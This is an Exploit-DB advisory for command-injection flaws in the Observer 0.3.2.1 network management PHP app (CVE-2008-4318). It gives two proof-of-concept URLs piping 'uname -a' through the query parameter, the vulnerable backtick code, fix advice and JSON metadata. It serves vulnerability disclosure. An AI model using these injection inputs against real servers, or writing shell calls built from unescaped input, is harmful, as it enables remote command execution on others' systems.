ID EDB-ID:6559
Type exploitdb
Reporter dun
Modified 2008-09-24T00:00:00
Description
Observer 0.3.2.1: multiple remote command execution vulnerabilities (CVE-2008-4318). Web application exploit for the PHP platform.
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
#########################################################
# [ observer <= 0.3.2.1 ] Remote Command Execution #
#########################################################
#
# Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
#
# Script site: http://www.project-observer.org/
# Download: http://freshmeat.net/projects/observer/
#
# Vuln:
# (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
# (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a
#
#
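# Bug(1): ./observer-0.3.2.1/html/whois.php
# Root cause: $_GET[query] is interpolated, unvalidated and unescaped, into a backtick (shell) command,
# so shell metacharacters in the parameter are interpreted by the shell. The command output is also
# echoed into the page without HTML escaping.
# Fix: validate query as a hostname or IP address (which also rejects values starting with '-')
# and pass it through escapeshellarg() before building the command line.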
#
# ...
# $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
# $output = trim($output);
# echo("<pre>$output</pre>");
# ...
#
#
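# Bug(2): ./observer-0.3.2.1/html/netcmd.php
# Every branch of the switch below (whois, ping, tracert, nmap) builds its backtick command from the
# unescaped $_GET[query], so all four cmd values are affected, not only the cmd=nmap case shown in (2).
# Each branch needs query validated as a hostname or IP address and shell-escaped (e.g. escapeshellarg()).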
#
# ...
# switch ($_GET[cmd]) {
# case 'whois':
# $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
# break;
# case 'ping':
# $output = `/bin/ping $_GET[query]`;
# break;
# case 'tracert':
# $output = `/usr/sbin/traceroute $_GET[query]`;
# break;
# case 'nmap':
# $output = `/usr/bin/nmap $_GET[query]`;
# break;
# }
# $output = trim($output);
# echo("<pre>$output</pre>");
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-09-24]
{"id": "EDB-ID:6559", "hash": "e04a948b90d842596a31d65ab729255b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities", "description": "Observer 0.3.2.1 Multiple Remote Command Execution Vulnerabilities. CVE-2008-4318. Webapps exploit for php platform", "published": "2008-09-24T00:00:00", "modified": "2008-09-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/6559/", "reporter": "dun", "references": [], "cvelist": ["CVE-2008-4318"], "lastseen": "2016-02-01T00:07:26", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-02-01T00:07:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4318"]}], "modified": "2016-02-01T00:07:26"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6559/", "sourceData": "\n :::::::-. ... ::::::. :::.\n ;;, `';, ;; ;;;`;;;;, `;;;\n `[[ [[[[' [[[ [[[[[. 
'[[\n $$, $$$$ $$$ $$$ \"Y$c$$\n 888_,o8P'88 .d888 888 Y88\n MMMMP\"` \"YmmMMMM\"\" MMM YM\n\n [ Discovered by dun \\ dun[at]strcpy.pl ]\n\n #########################################################\n # [ observer <= 0.3.2.1 ] Remote Command Execution #\n #########################################################\n #\n # Script: \"Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks.\"\n #\n # Script site: http://www.project-observer.org/\n # Download: http://freshmeat.net/projects/observer/\n #\n # Vuln: \n # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a\n # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a \n #\n #\n # Bug(1): ./observer-0.3.2.1/html/whois.php\n #\n # ...\n # \t$output = `/usr/bin/whois $_GET[query] | grep -v \\%`;\n #\t$output = trim($output);\n #\techo(\"<pre>$output</pre>\");\n # ... \t \n #\n #\n # Bug(2): ./observer-0.3.2.1/html/netcmd.php\n #\n # ...\n # switch ($_GET[cmd]) {\n # case 'whois':\n # $output = `/usr/bin/whois $_GET[query] | grep -v \\%`;\n # break;\n # case 'ping':\n # $output = `/bin/ping $_GET[query]`;\n # break;\n # case 'tracert':\n # $output = `/usr/sbin/traceroute $_GET[query]`;\n # break;\n # case 'nmap':\n # $output = `/usr/bin/nmap $_GET[query]`;\n # break;\n # }\n # $output = trim($output);\n # echo(\"<pre>$output</pre>\");\n # ... \t\t\t \t\t \n #\n #\n ###############################################\n # Greetz: D3m0n_DE * str0ke * and otherz..\n ###############################################\n\n [ dun / 2008 ] \n\n*******************************************************************************************\n\n# milw0rm.com [2008-09-24]\n", "osvdbidlist": ["48912", "48913"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:28", "bulletinFamily": "NVD", "description": "Observer 0.3.2.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the query parameter to (1) whois.php or (2) netcmd.php.", "modified": "2017-09-29T01:32:00", "id": "CVE-2008-4318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4318", "published": "2008-09-29T19:25:00", "title": "CVE-2008-4318", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}